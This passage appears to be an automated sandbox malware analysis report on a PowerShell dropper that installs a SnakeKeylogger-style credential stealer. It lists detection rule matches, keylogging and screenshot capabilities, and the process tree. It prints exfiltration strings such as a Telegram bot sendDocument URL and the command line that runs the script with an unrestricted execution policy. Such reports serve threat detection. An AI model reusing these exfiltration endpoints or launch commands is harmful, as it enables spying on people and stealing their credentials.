                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3561012005.0000000006280000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r10.o.lencr.org0#
                      Source: powershell.exe, 00000000.00000002.1116625210.00000000050F1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1133468244.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000000.00000002.1116625210.0000000005246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1121376913.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, 00000005.00000002.3563748591.0000000008B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or221
                      Source: x.exe, 00000005.00000002.3561012005.0000000006313000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3561012005.0000000006280000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: x.exe, 00000005.00000002.3561012005.0000000006313000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3561012005.0000000006280000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: powershell.exe, 00000000.00000002.1116625210.00000000050F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: x.exe, 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                      Source: x.exe, 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 00000006.00000003.1203431663.0000021EB5CF0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: powershell.exe, 00000000.00000002.1116625210.0000000005246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1121376913.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to capture screen (.Net source)
                      Source: 4.2.x.exe.4329590.3.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 4.2.x.exe.4329590.3.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                      Source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 6676, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Powershell drops PE file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D508484_2_00D50848
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D581604_2_00D58160
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D57AF04_2_00D57AF0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D51DD04_2_00D51DD0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D598184_2_00D59818
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D508384_2_00D50838
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D57AE04_2_00D57AE0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D51DC04_2_00D51DC0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D595F04_2_00D595F0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D595E14_2_00D595E1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D57ED14_2_00D57ED1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00D597CC4_2_00D597CC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_02AAC5305_2_02AAC530
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_02AA94805_2_02AA9480
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_02AAC5215_2_02AAC521
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_02AA2DD15_2_02AA2DD1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_02AA946F5_2_02AA946F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0655F5485_2_0655F548
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0655D0285_2_0655D028
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0655F5385_2_0655F538
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0655E1D75_2_0655E1D7
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0655E1E85_2_0655E1E8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06557B085_2_06557B08
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0706B4A05_2_0706B4A0
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0706A3B85_2_0706A3B8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_070667C85_2_070667C8
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_070667D45_2_070667D4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0706B4905_2_0706B490
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_070674915_2_07067491
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_070674A05_2_070674A0
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RUNPEE.dll ACD44760A750AFD0DB17EC0B55BD092372AA0FE827B90B891B6B8C19638174F6
                      Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 6676, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 4.2.x.exe.4329590.3.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.2.x.exe.4329590.3.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@8/14@5/7
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.logJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tm4nhvmr.qwh.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: DON.ps1Virustotal: Detection: 20%
                      Source: DON.ps1ReversingLabs: Detection: 28%
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\DON.ps1"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\DON.ps1"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
